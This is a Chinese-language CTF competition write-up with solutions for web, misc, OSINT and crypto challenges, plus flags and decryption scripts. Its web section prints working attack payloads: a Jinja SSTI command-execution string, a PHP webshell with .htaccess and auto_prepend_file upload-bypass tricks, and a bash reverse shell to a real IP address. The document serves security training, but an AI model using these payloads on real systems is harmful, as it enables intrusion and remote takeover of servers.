WEB

ezpython

源码找到路由/s3c0nd,进去发现需要fuzz,(直接盲猜114514结果对了),再进去是个ssti,直接打就行

GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}}

image-20250816113602863

ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088}

1ezbypass

<?php

$test=$_GET['test'];

if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|implode|phpinfo|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|session_id|session_start|echo|readfile|highlight|show|source|file|assert/i", $test)){
    eval($test);
}
else{
    echo "oh nonono hacker!";
}

highlight_file(__FILE__);

1ezupload

检测了<?,@

<script language='php'>eval($_POST[123]);</script>
bash -c 'bash -i >& /dev/tcp/47.108.237.7/1223 0>&1' >
<FilesMatch "1.phtml">
  SetHandler application/x-httpd-php
</FilesMatch>
auto_prepend_file = 1.jpg

1Pickle♥dill

% import io
% raise Exception(io.FileIO('/flag').read().decode('latin1'))

MISC

签到

base64解码,然后去查这个域名的txt记录

dig TXT ctf.ctf.vin

image-20250816114654407

flag{W3lc0m3_T0_NETDREAMCTF!!!!!}

ezimg

发现图片文件最后有一串base64编码,解码得到一个腾讯文档地址https://docs.qq.com/doc/DZWxobHhmRW9pd09k,上面写flag不在这里,但是刷新页面可以看到在图片加载之前图片下方有一串编码,在页面中全选复制粘贴可以得到以下东西

image-20250816135607305

并非flag
flag{114514-1919810-B1ngF3i_1s_a_@mazing_0ld3r}
aHR0cHM6Ly93d2duLmxhbnpvdWwuY29tL2kzcTR5MzBodWVmYQ==

解码得到https://wwgn.lanzoul.com/i3q4y30huefa,下载源码让ai写个解密脚本得到flag

from cryptography.fernet import Fernet
import base64

# 构造 key
key = base64.urlsafe_b64encode(b'flag{114514-1919810-B1ngF3i_1s_a_@mazing_0ld3r}'[:32].ljust(32, b'\0'))

# 初始化 Fernet
cipher = Fernet(key)

# 你的密文(示例中用你提供的)
encrypted = b'gAAAAABoa6KH5msX3aA5PUiSZq1Ubma9DvtpU9ywyijLEbfQYNl-hn5Q_4NlmpcAD2pNjq07KvMYd2R32Id_R_3iW5GZn3yKTBW5R_5jFI_307_S9oep0zE0dhZCf_XOymC2WQhB2_6s'

# 解密
decrypted = cipher.decrypt(encrypted)

# 输出原文
print(decrypted.decode())

image-20250816135300928

flag{Hu@ngD0w_L0v3s_M1sc_F0r3v3r!!!!!}

I_AM_K

import base64

def decrypt(ciphertext):
    """
    根据提供的加密算法逆向解密密文。
    """
    # 第 1 步:Hex 解码
    try:
        caesar_shifted = bytes.fromhex(ciphertext).decode('utf-8')
    except ValueError:
        return "错误:密文不是有效的十六进制格式。"

    # 第 2 步:暴力破解凯撒密码 (共 26 种可能)
    for shift in range(26):
        base64_candidate = ""
        for char in caesar_shifted:
            if 'a' <= char <= 'z':
                shifted_char = chr(((ord(char) - ord('a') - shift + 26) % 26) + ord('a'))
                base64_candidate += shifted_char
            elif 'A' <= char <= 'Z':
                shifted_char = chr(((ord(char) - ord('A') - shift + 26) % 26) + ord('A'))
                base64_candidate += shifted_char
            else:
                base64_candidate += char
        
        # 第 3 步:尝试 Base64 解码
        try:
            # Base64 解码前可能需要补全 '='
            missing_padding = len(base64_candidate) % 4
            if missing_padding:
                base64_candidate += '=' * (4 - missing_padding)
            
            encrypted_bytes = base64.b64decode(base64_candidate)
            
            # 如果解码成功,我们可能找到了正确的 shift
            # 第 4 步:利用已知明文 "flag{" 推算 key_sum
            known_prefix = b"flag{"
            if len(encrypted_bytes) < len(known_prefix):
                continue

            # 根据第一个字符 'f' 计算 key_sum
            key_sum = (encrypted_bytes[0] - known_prefix[0] + 256) % 256
            
            # 验证 key_sum 是否对 "lag{" 也成立
            valid_key_sum = True
            for i in range(1, len(known_prefix)):
                if encrypted_bytes[i] != (known_prefix[i] + key_sum) % 256:
                    valid_key_sum = False
                    break
            
            if valid_key_sum:
                # 找到了正确的 key_sum,开始解密全文
                # 第 5 步:逆向字符偏移
                decrypted_chars = []
                for byte_val in encrypted_bytes:
                    original_char_code = (byte_val - key_sum + 256) % 256
                    decrypted_chars.append(chr(original_char_code))
                
                # 第 6 步:返回最终结果
                return "".join(decrypted_chars)

        except (base64.binascii.Error, ValueError):
            # 如果 Base64 解码失败,说明 shift 不正确,继续尝试下一个
            continue
            
    return "解密失败,未能找到有效的解密路径。"

# 提供的密文
ciphertext = "686545356839417466377a5266364133695a54556a376857696f6c4e67377a5166364248"

# 执行解密
decrypted_flag = decrypt(ciphertext)

print(f"密文: {ciphertext}")
print(f"解密结果: {decrypted_flag}")

image-20250816130831420

flag{I_am_K_hypocritical_K}

OSINT

Bridge

谷歌识图发现和重庆万州的桥相似

image-20250816114827444

去搜一下发现是牌楼长江大桥

flag{牌楼长江大桥}

Where_am_i

这个谷歌直接出

image-20250816115632375

flag{渥太华医院}

PWN

1ezpwn

CRYPTO

EzRSA

ai一把梭

import gmpy2

# 已知参数
n = 3256593900815599638610948588846270419272266309072355018531019815816383416972716648196614202756266923662468043040766972587895880348728177684427108179441398076920699534139836200520410133083399544975367893285080239622582380507397956076038256757810824984700446326253944197017126171652309637891515864542581815539
e = 3
c = 1668144786169714702301094076704686642891065952249900945234348491495868262367689770718451252978033214169821458376529832891775500377565608075759008139982766645172498702491199793075638838575243018129218596030822468832530007275522627172632933

# 利用 gmpy2 求立方根
m_root, exact = gmpy2.iroot(c, e)

if exact:
    m = int(m_root)
    flag_bytes = m.to_bytes((m.bit_length() + 7) // 8, byteorder='big')
    print("Recovered FLAG:", flag_bytes)
else:
    print("Failed to recover exact integer root. Try more advanced methods.")

image-20250816115834852

flag{EZ_3Z++==+__U_C@n_F1n1sh_1t}

Quaternion_Lock

同样ai一把梭

import itertools

p = 9223372036854775783
e = 65537
subgroup_order = 60480

X = (7380380986429696832, 34163292457091182, 3636630423226195928, 3896730209645707435)
Y = (1015918725738180802, 4456058114364993854, 0, 0)

# ---- 四元数运算 ----
def qmul(q1, q2, p):
    a1, b1, c1, d1 = q1
    a2, b2, c2, d2 = q2
    return (
        (a1*a2 - b1*b2 - c1*c2 - d1*d2) % p,
        (a1*b2 + b1*a2 + c1*d2 - d1*c2) % p,
        (a1*c2 - b1*d2 + c1*a2 + d1*b2) % p,
        (a1*d2 + b1*c2 - c1*b2 + d1*a2) % p
    )

def qconj(q, p):
    a, b, c, d = q
    return (a % p, (-b) % p, (-c) % p, (-d) % p)

def qnorm(q, p):
    a, b, c, d = q
    return (a*a + b*b + c*c + d*d) % p

def qinv(q, p):
    n = qnorm(q, p)
    inv_n = pow(n, -1, p)
    qc = qconj(q, p)
    return (qc[0] * inv_n % p, qc[1] * inv_n % p, qc[2] * inv_n % p, qc[3] * inv_n % p)

def qpow(q, exp, p):
    result = (1, 0, 0, 0)
    base = q
    while exp:
        if exp & 1:
            result = qmul(result, base, p)
        base = qmul(base, base, p)
        exp //= 2
    return result

# ---- 解密 ----
g = (2,1,0,0)
h = qpow(g, ((p*p-1)//subgroup_order), p)

# 暴力搜索 r 使得 K = h^r 满足 Y = K^e
for r in range(1, subgroup_order):
    K = qpow(h, r, p)
    if qpow(K, e, p) == Y:
        print("Found r =", r)
        K_inv = qinv(K, p)
        F = qmul(K_inv, qmul(X, K, p), p)
        print("Recovered F (四元数) =", F)
        # 转回 bytes
        flag_bytes = b''
        for part in F:
            flag_bytes += part.to_bytes((part.bit_length()+7)//8, 'big')
        print("Recovered flag bytes:", flag_bytes)
        break

image-20250816125011353

flag{0k@y_U_C@n_F1n1sh_iT!!!}